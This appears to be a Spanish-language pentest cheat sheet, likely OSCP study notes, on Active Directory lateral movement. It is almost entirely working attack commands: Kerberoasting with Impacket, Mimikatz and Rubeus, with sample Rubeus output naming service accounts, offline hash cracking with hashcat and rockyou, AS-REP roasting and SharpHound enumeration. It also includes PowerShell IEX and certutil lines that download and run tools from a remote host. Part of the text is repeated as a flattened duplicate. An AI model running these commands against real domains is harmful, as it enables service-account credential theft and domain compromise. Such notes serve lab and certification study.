AD Lateral Movement

Obteniendo ticket Kerberos por medio de Rubeus

## Metodo Impacket
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request
## Metodo Mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1')
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433"
certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe
.\mimikatz.exe 'kerberos::list /export' exit


C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt
Rubeus.exe kerberoast /outfile:hash.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : xor.com
[*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 3


[*] SamAccountName         : ExchangeService
[*] DistinguishedName      : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com
[*] ServicePrincipalName   : HTTP/ExchangeService.xor.com
[*] PwdLastSet             : 5/20/2019 1:07:08 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt

python3 tgsrepcrack.py /usr/share/wordlists/rockyou.txt /home/gerh/Escritorio/OSCP/Machines/host-123/KERBEROS/4-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi
hashcat --force -m 13100 hash-end.txt /usr/share/wordlists/rockyou.txt

AS-REP

 Rubeus.exe asreproast
 # Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User
 hashcat -m 18200 hash.txt Pass.txt.

SHARPHOUND

.\SharpHound.exe -c all

PS C:\htb> Import-Module .\SharpHound.ps1
PS C:\htb> Invoke-BloodHound -CollectionMethod all

AnteriorAD Authentication SiguienteAD Vulnerabilidades actuales

Última actualización hace 2 años

## Metodo Impacket impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request ## Metodo Mimikatz powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1') Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433" certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe .\mimikatz.exe 'kerberos::list /export' exit C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt Rubeus.exe kerberoast /outfile:hash.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.1 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target Domain : xor.com [*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' [*] Total kerberoastable users : 3 [*] SamAccountName : ExchangeService [*] DistinguishedName : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com [*] ServicePrincipalName : HTTP/ExchangeService.xor.com [*] PwdLastSet : 5/20/2019 1:07:08 PM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt

python3 tgsrepcrack.py /usr/share/wordlists/rockyou.txt /home/gerh/Escritorio/OSCP/Machines/host-123/KERBEROS/4-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi hashcat --force -m 13100 hash-end.txt /usr/share/wordlists/rockyou.txt